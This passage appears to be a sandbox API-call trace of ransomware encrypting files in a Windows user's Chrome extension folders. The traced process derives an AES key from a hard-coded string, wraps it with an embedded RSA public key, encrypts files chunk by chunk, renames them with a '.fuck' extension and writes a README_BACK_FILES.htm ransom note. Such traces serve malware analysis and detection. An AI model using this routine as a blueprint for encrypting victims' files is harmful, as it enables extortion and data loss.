pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.128] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.140] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.141] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.141] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.141] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.141] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.141] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.141] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.141] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.141] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.141] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.141] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.141] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.141] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.142] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.142] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.142] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.142] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.142] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.142] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.142] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.143] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.143] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.143] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.143] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.143] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.143] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.143] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.144] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x316, lpOverlapped=0x0) returned 1 [0264.144] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x316, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x320) returned 1 [0264.144] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x320, lpOverlapped=0x0) returned 1 [0264.144] CloseHandle (hObject=0x5d60) returned 1 [0264.144] CloseHandle (hObject=0x5d5c) returned 1 [0264.144] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), bFailIfExists=0) returned 1 [0264.146] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json", dwFileAttributes=0x0) returned 1 [0264.147] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.gsg")) returned 1 [0264.148] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.fuck")) returned 1 [0264.149] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0264.149] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.149] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.149] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.149] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0264.150] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\readme_back_files.htm")) returned 0xffffffff [0264.150] AreFileApisANSI () returned 1 [0264.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.150] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.151] GetFileType (hFile=0x5d64) returned 0x1 [0264.151] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.156] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.156] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0264.156] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.156] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.156] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.156] GetLastError () returned 0x0 [0264.156] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json")) returned 0x20 [0264.157] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json", dwFileAttributes=0x80) returned 1 [0264.158] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.158] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.159] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.159] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.161] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.161] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.161] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.161] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0264.162] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.162] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.162] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e76870) returned 1 [0264.162] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76870, dwCertEncodingType=0x1, pInfo=0x2eafcc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eafcf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eafcf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ec40) returned 1 [0264.162] CryptEncrypt (in: hKey=0x2e7ec40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.162] CryptEncrypt (in: hKey=0x2e7ec40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76100*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e76100*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.163] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e76100*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e76100*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.163] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.169] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.169] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.181] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.182] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.182] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, 